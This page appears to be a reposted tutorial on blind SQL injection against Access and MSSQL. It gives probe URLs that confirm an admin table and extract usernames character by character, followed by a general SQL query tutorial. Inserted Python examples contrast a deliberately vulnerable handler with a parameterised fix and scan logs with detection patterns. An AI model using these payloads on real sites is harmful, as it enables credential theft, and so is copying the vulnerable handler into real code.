Quick learning and understanding of SQL Injection Technology

Source: Internet
Author: User
Tags: check character

Source: age and month Alliance

Detect whether injection can be performed
http://127.0.0.1/xx?id=11 and 1=1   (normal page)
http://127.0.0.1/xx?id=11 and 1=2   (error page)

Detect the table
http://127.0.0.1/xx?id=11 and exists (select * from admin)

Detect the field
http://127.0.0.1/xx?id=11 and exists (select username from admin)

Detect the ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where id=1)

Detect the length
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and id=1)

Check whether the database is MSSQL
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)

Check whether the character is an English (ASCII) character

(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and id=1)

(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and id=1)

Narrow the range of the character code

(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and id=1)

(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and id=1)

Check the exact character

(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) = 97 and id=1)

(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) = 97 and id=1)
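The probes above only work because the request parameter is pasted straight into the SQL text. The following Python example is added here and is not part of the original article: it builds a constructed in-memory SQLite stand-in for the page's "xx?id=11" endpoint (the "news" and "admin" tables and their rows are sample data), shows the concatenating handler beside a validated, parameterised one, applies the page's first test (the "and 1=1" / "and 1=2" pair) to each, and then scans a few constructed access-log lines for the request shapes this page lists so a reviewer can spot them after the fact. All names, patterns and log lines are the example's own assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the page's "xx?id=11" endpoint: a "news" table the
# page reads from and an "admin" table the probes ask about. Sample data only.
def make_site_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin(id INTEGER PRIMARY KEY, username TEXT);
        INSERT INTO news VALUES (11, 'hello');
        INSERT INTO admin VALUES (1, 'admin');
    """)
    return conn

def vulnerable_lookup(conn, id_param):
    """The bug: the raw request parameter is pasted into the SQL text, so
    'id=11 and 1=2' rewrites the WHERE clause instead of supplying a value."""
    return conn.execute("SELECT title FROM news WHERE id = " + id_param).fetchall()

def hardened_lookup(conn, id_param):
    """The fix: validate the type first, then bind the value as a parameter.
    Returns None for anything that is not an integer (no fallback to concatenation)."""
    try:
        id_value = int(id_param)
    except ValueError:
        return None
    return conn.execute("SELECT title FROM news WHERE id = ?", (id_value,)).fetchall()

def boolean_oracle_present(lookup):
    """The page's first test: an always-true and an always-false suffix must
    produce the same response; if they differ, the handler leaks a boolean oracle."""
    conn = make_site_db()
    return lookup(conn, "11 and 1=1") != lookup(conn, "11 and 1=2")

# Request shapes used on this page, as patterns a log reviewer can look for.
PROBE_PATTERNS = {
    "tautology":  re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "exists":     re.compile(r"\bexists\s*\(\s*select\b"),
    "char_guess": re.compile(r"\b(asc|unicode)\s*\(\s*(mid|substring)\s*\("),
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed access-log lines (combined log format); not real traffic.
LOG_LINES = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /xx?id=11 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /xx?id=11%20and%201=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /xx?id=11%20and%201=2 HTTP/1.1" 200 233',
    '127.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /xx?id=11%20and%20exists(select%20*%20from%20admin) HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:10:00:04 +0000] "GET /xx?id=11%20and%20exists(select%20id%20from%20admin%20where%20asc(mid(username,1,1))=97%20and%20id=1) HTTP/1.1" 200 512',
]

def flag_requests(log_lines):
    """Return (line index, [matched pattern names]) for every request whose
    URL-decoded query string matches one of the probe shapes above."""
    flagged = []
    for i, line in enumerate(log_lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = unquote_plus(m.group(1)).lower()
        hits = [name for name, rx in PROBE_PATTERNS.items() if rx.search(decoded)]
        if hits:
            flagged.append((i, hits))
    return flagged

if __name__ == "__main__":
    print("vulnerable handler leaks oracle:", boolean_oracle_present(vulnerable_lookup))
    print("hardened handler leaks oracle: ", boolean_oracle_present(hardened_lookup))
    for idx, names in flag_requests(LOG_LINES):
        print(f"line {idx}: {', '.join(names)}")
```

Note that the hardened handler rejects the probe outright rather than trying to strip keywords: an integer parameter has an integer type, and the bind marker guarantees the value is never parsed as SQL. The log scanner is deliberately narrow (it keys on the exact shapes in this article), so treat it as a starting point for a review rule rather than a complete signature set.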

Common functions

Access: asc(character)        SQL Server: unicode(character)
Purpose: return the character code (ASCII code) of a character.

Access: chr(number)           SQL Server: nchar(number)
Purpose: the inverse of asc; return the character for a given code.

Access: mid(string, N, L)     SQL Server: substring(string, N, L)
Purpose: return L characters of the string starting at position N (positions N through N+L-1).

Access: abs(number)           SQL Server: abs(number)
Purpose: return the absolute value of a number (used when guessing Chinese characters).

Access: A between B and C     SQL Server: A between B and C
Purpose: determine whether A lies between B and C.

and exists (select top 1 * from user order by id)


1. Naming the columns in the query result:
A. Use the as keyword: select name as name from students order by age
B. Write the column directly: select name from students order by age

2. Exact search:
A. Use in to give a set of values: select * from students where native in ('Hunan', 'Sichuan')
B. between ... and: select * from students where age between 20 and 30
C. "=": select * from students where name = 'Li Shan'
D. like: select * from students where name like 'Li%', which matches names that start with "Li". To find every name that contains "Li", use '%Li%'; if "Li" must be the second character, use '_Li%' or '_Li_'.
E. [] matches one character from a set: select * from courses where cno like '[AC]%' (for a single character this works like in (...), and [] can also give a range, for example select * from courses where cno like '[A-C]%')


3. Handling datetime-type columns
A. smalldatetime: compare against the date written as a string. For example: select * from students where birth >= '1980-1-1' and birth <= '1980-12-31'


4. Aggregate functions
A. count() counts rows, for example: select count(*) from students (total number of students)
B. avg(column) computes the mean, for example: select avg(mark) from grades where cno = 'b2'
C. max(column) and min(column): maximum and minimum

5. Grouping
Commonly used for statistics, such as counting rows per group: select gender, count(sno) from students group by gender (the number of male and female students)
Note: the column you want the statistics broken down by is the column you group by.
For several grouping levels, just list every grouping column. For example, to count the male and female students in each major of each year, the grouping columns are year (grade), major (mno) and gender, so the clause is "group by grade, mno, gender":
select grade, mno, gender, count(*) from students group by grade, mno, gender
group by is usually combined with having. For example, to find students who failed more than one course, group the failing rows by student ID (sno) and keep only the groups with more than one row:
select sno, count(*) from grades where mark < 60 group by sno having count(*) > 1


6. UNION
Merges query results, for example:
SELECT * FROM students WHERE name like 'zhang%' UNION [ALL] SELECT * FROM students WHERE name like 'Li%'


7. Multi-table queries
A. Inner join
select g.sno, s.name, c.coursename from grades g JOIN students s ON g.sno = s.sno JOIN courses c ON g.cno = c.cno
(Note that the tables are given aliases and referenced through them)
B. Outer join
B1. left join
select courses.cno, max(coursename), count(sno) from courses left join grades ON courses.cno = grades.cno group by courses.cno
Left join feature: every row of the left table appears, even those with no matching row on the right (the right-hand columns are then null).
The left outer join returns the rows that exist in the left table but have no match in the right table, plus the rows of the inner join.
B2. right join
The mirror image of left join
B3. full join
select sno, name, major from students full join majors ON students.mno = majors.mno
Shows the rows of both tables
C. Self join
select c1.cno, c1.coursename, c1.pno, c2.coursename from courses c1, courses c2 where c1.pno = c2.cno
The table is joined to itself; aliases tell the two copies apart.
D. Cross join
select lastname + firstname from lastname cross join firstname
Equivalent to the Cartesian product


8. Nested queries
A. Use the keyword IN, for example, to find the students who share a hometown with the student named 'pipig':
select * from students where native in (select native from students where name = 'pipig')
B. Use the keyword EXISTS. For example, the following two statements are equivalent:
select * from students where sno in (select sno from grades where cno = 'b2')

select * from students where exists (select * from grades where grades.sno = students.sno AND cno = 'b2')


9. Sorting
A. There are two sort directions: asc (ascending) and desc (descending).
B. The sort key can be one of the selected columns referred to by its position number, for example:
select sno, count(*), avg(mark) from grades group by sno having avg(mark) > 85 order by 3

10. Others
A. Names that contain spaces must be enclosed in delimiters.
B. Use IS NULL to find rows with no data in a column, for example: select sno, courseno from grades where mark IS NULL
C. Distinguish any from all in nested queries: any behaves like the logical OR ("|"), all like the logical AND ("&").
D. Be careful with queries that express a negation:
For example, students who have not taken course 'b2':
select students.* from students, grades where students.sno = grades.sno AND grades.cno <> 'b2'
This query is incorrect. The correct form is:
select * from students where not exists (select * from grades where grades.sno = students.sno AND cno = 'b2')

11. Approach to difficult multi-level nested queries, for example students who have taken every course:
select * from students where not exists (select * from courses where not exists (select * from grades where sno = students.sno AND cno = courses.cno))
Read it by exclusion: from the student table, exclude every student for whom some course exists that they have no grade row for. Because the subject is "courses", the middle query runs over the course table, and the innermost query over grades removes the courses the student has actually taken; what remains is the courses not taken, and not exists on that set keeps only the students who are missing none.
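To make the points in sections 5, 7, 10 and 11 concrete, here is an added Python example that is not part of the original article. It loads a constructed sample of the article's tables (students, courses, grades; the rows are invented) into an in-memory SQLite database and runs the incorrect "not taken 'b2'" join beside the correct not exists form, the double not exists "taken every course" query, the group by ... having count(*) > 1 query, and a left join count that shows a student with no grade rows. The ORDER BY clauses are added for deterministic results; SQLite lacks the full join and top 1 syntax the article mentions, so those are not exercised.

```python
import sqlite3

# Constructed sample schema matching the article's tables, with rows chosen so
# that each query below has a clear, checkable answer.
def make_school_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE students(sno TEXT PRIMARY KEY, name TEXT, gender TEXT);
        CREATE TABLE courses(cno TEXT PRIMARY KEY, coursename TEXT);
        CREATE TABLE grades(sno TEXT, cno TEXT, mark INTEGER);
        INSERT INTO students VALUES ('s1','Ann','F'),('s2','Bob','M'),('s3','Cai','M'),('s4','Dee','F');
        INSERT INTO courses VALUES ('b1','Algebra'),('b2','Databases'),('b3','Networks');
        INSERT INTO grades VALUES
            ('s1','b1',90),('s1','b2',55),('s1','b3',70),
            ('s2','b1',40),
            ('s3','b1',50),('s3','b2',45);
    """)
    return conn

def rows(conn, sql):
    return conn.execute(sql).fetchall()

def not_taken_b2_wrong(conn):
    """The article's incorrect form: a join filtered on cno <> 'b2'. It keeps
    any student who has at least one other course (once per such course) and
    silently drops students who have no grade rows at all."""
    return [r[0] for r in rows(conn, """
        SELECT students.sno FROM students, grades
        WHERE students.sno = grades.sno AND grades.cno <> 'b2'
        ORDER BY students.sno""")]

def not_taken_b2_correct(conn):
    """The correct form: NOT EXISTS over the student's own grade rows for 'b2'."""
    return [r[0] for r in rows(conn, """
        SELECT sno FROM students
        WHERE NOT EXISTS (SELECT * FROM grades
                          WHERE grades.sno = students.sno AND cno = 'b2')
        ORDER BY sno""")]

def taken_all_courses(conn):
    """Section 11: no course exists for which the student has no grade row."""
    return [r[0] for r in rows(conn, """
        SELECT sno FROM students
        WHERE NOT EXISTS (SELECT * FROM courses
                          WHERE NOT EXISTS (SELECT * FROM grades
                                            WHERE sno = students.sno AND cno = courses.cno))
        ORDER BY sno""")]

def failing_more_than_one(conn):
    """Section 5: group the failing rows by sno, keep groups with more than one row."""
    return rows(conn, """
        SELECT sno, COUNT(*) FROM grades
        WHERE mark < 60 GROUP BY sno HAVING COUNT(*) > 1
        ORDER BY sno""")

def courses_per_student(conn):
    """Section 7: a left join keeps students with no grade rows (count 0),
    which an inner join would drop."""
    return rows(conn, """
        SELECT s.sno, COUNT(g.cno) FROM students s
        LEFT JOIN grades g ON s.sno = g.sno
        GROUP BY s.sno ORDER BY s.sno""")

if __name__ == "__main__":
    db = make_school_db()
    print("wrong 'not taken b2':  ", not_taken_b2_wrong(db))
    print("correct 'not taken b2':", not_taken_b2_correct(db))
    print("taken every course:    ", taken_all_courses(db))
    print("failed > 1 course:     ", failing_more_than_one(db))
    print("courses per student:   ", courses_per_student(db))
```

With this data the incorrect join returns s1, s1, s2, s3 (s1 and s3 did take 'b2', s1 is repeated, and s4 with no grades is missing entirely), while the not exists form returns exactly s2 and s4.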
